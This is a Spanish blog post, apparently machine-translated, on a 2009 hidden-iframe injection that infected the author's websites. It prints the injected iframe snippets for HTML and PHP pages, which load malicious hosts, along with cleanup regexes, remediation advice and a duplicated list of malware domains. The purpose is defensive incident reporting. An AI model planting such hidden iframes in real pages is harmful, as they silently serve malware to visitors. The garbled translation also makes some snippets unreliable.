[Actualizado el 27 de octubre de 2009 con una versión nueva del guión]
Es una lástima que después de todos estos puestos de seguridad, algunos de mis sitios web fueron atacados hoy en día.
Shoban y Anand me correo electrónico acerca de esta mañana de hoy (Gracias chicos) y yo tratamos de entender lo que estaba pasando. Para mi absoluta incredulidad más de 10 sitios web alojados en el mismo servidor se vieron afectados por el ataque.
Todo el índice .* archivos en el servidor se infectaron con un pedazo de código que carga un iframe oculto en la página.
Para las páginas HTML el siguiente fragmento de código se agregó:
iframe src <= "http://goooogleadsence.biz/?click=8F9DA" width = 1 height = 1 style = "visibilidad: oculto; position: absolute"> </ iframe>
Para php páginas añadió:
echo "src=\"http://goooogleadsence.biz/?click=8F9DA\" <iframe width=1 height=1 style=\"visibility:hidden;position:absolute\"> </ iframe>";
Asha tomó el esfuerzo y limpiado la mayor parte de los archivos infectados. Estamos monitoreando la situación ahora.
¿Cómo el gusano se inyectan la iframes ocultos a mis archivos?
Hay dos maneras a través del cual se cree que el gusano para infectar los archivos:
1) Server está comprometida
Esta es la forma más común. Algunos sitios web o los que residen en el mismo servidor web como su página web puede verse comprometida (o puede ser algunas vulnerabilidades en la aplicación web en sí) que causó el servidor web para ser comprometida. Una vez que el servidor se ve comprometida, el gusano se propagará a todos los sitios web en el servidor.
2) del lado del cliente FTP
El gusano se encuentra en algunos o ninguno de los equipos del lado del cliente se utiliza para acceder al ftp / panel de control de cuentas de su servidor de alojamiento.
Cuando se escribe el nombre de usuario y contraseña para el ftp / panel de control cuenta, el gusano lee en silencio las credenciales, accede a su cuenta ftp e infecta los archivos en el servidor. Agrega el mencionado código anterior para todos los índices .* archivos.
¿Cómo puedo recuperar de un ataque de inyección de iframe oculto?
Éstos son algunos consejos que pueden ayudar:
- Lo primero que debe hacer para prevenir este tipo de ataques es cambiar su ftp, panel de control y las contraseñas de base de datos tan pronto como sea posible.
- Notifique a su proveedor de alojamiento web sobre el ataque y el asesoramiento a tomar medidas contra un posible ataque de servidor de gama.
- Cambiar los permisos de archivo en su servidor para el modo de garantizar al máximo.
- Descargar todos los archivos desde el servidor y detectar posibles infecciones. Limpie los archivos infectados.
- El uso de un software antivirus bueno, escanear y limpiar cada PC que utilice para acceder a su servidor de alojamiento.
- Nunca utilice ordenadores públicos para acceder a su servidor.
¿Cómo puedo limpiar los archivos infectados?
Utilice estas expresiones regulares para buscar todas las páginas del código malicioso conteniendo una y sustituirlo por el espacio:
src=\"http://[^"]*" <iframe width=1 height=1 style=\"visibility:hidden;position:absolute\"> </ iframe>
echo \ "src=\\\"http://[^"]*\" <iframe width=1 height=1 style=\\\"visibility:hidden;position:absolute\\\"> </ iframe> \ ";
Puede que tenga que escribir un script para automatizar esto para todos los archivos en el servidor.
He cocinado un script PHP que puede ayudarle a encontrar los archivos infectados. Descargue el archivo de aquí , guardarlo como clean.php (en estos momentos clean.php.txt) y subirlo a la carpeta raíz de su sitio web.
Es posible que desee cambiar algunos valores codificados dentro del archivo.
Entonces visite la URL:
http://www.yourdomain.com/clean.php?c=iframe
C El parámetro especifica el texto a buscar dentro del archivo. Los resultados serán algo así como:

Se buscará todos los archivos de su sitio web y si alguno de los archivos contiene la cadena dada, se imprimirá el nombre del archivo junto con el número de ocurrencias de la cadena. En la imagen anterior, se puede ver que un archivo está infectado.
Tenga en cuenta que el guión no se eliminará el iframes de sus archivos. limpieza automatizada podría romper algunos de sus sitios web. Así que a partir de ahora usted tendrá que limpiar los archivos manualmente.
Faiz ha escrito un guión avanzado ASP.Net para encontrar los archivos infectados, y se puede encontrar aquí .
¿Mi posición en los buscadores verán afectados por este ataque?
Trate de ser rápido con estos pasos, porque si un visitante vea el mensaje "Este sitio podría dañar tu equipo" pop-up cuando (s) que intentan acceder a su sitio web / blog, (s) no puede reaparecer de nuevo. Recuerde que si la seguridad de su sitio web se ve comprometida, puede afectar el posicionamiento en los buscadores de la web. Además, puede preparar el camino para más sofisticados ataques.
Google marcará su sitio en él los resultados de búsqueda con una advertencia: "Este sitio podría dañar tu equipo".
Utilice el siguiente enlace para ver lo que Google piensa en su sitio web (indicar la URL de su sitio en vez de shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
Como se mencionó anteriormente, debe quitar el malware de tu máquina local usando algún software antivirus. AVG lo ve como "Caballo de Troya Downloader" y NOD32 lo ve como "JS / troyano Kryptik.B".
Tenga en cuenta que cuando se visita un sitio infectado, algunos softwares antivirus le pedirá que "Caballo de Troya downloader", un archivo exe-está tratando de cargar. Una vez que el exe infecta su máquina, puede infectar su servidor también.
Éstos son algunos ejemplos de código más atrapados en el medio silvestre:
src="http://hostverify.net/?click=2730375" <iframe width=1 height=1 style="visibility:hidden;position:absolute"> </ iframe>
src="http://hosttracker.net/?click=32431937" <iframe width=1 height=1 style="visibility:hidden;position:absolute">
Hay ofuscado versiones del código de ataque también:
<script> función c102916999516l4956a7e7c979e (l4956a7e7c9b86) (... etc
Aquí está una lista de algunos otros sitios web que el contenido de acogida malicioso:
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net /
http://live-counter.net
http://klinoneshoes.info
protección livescan.com /
http://webexperience13.com
http://q5x.ru
http://q5x.ru
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net /
http://live-counter.net
http://klinoneshoes.info
protección livescan.com /
http://webexperience13.com
http://q5x.ru
Si usted encuentra estas URL en cualquier código en tu sitio web, que es un signo seguro del tiro que usted está infectado.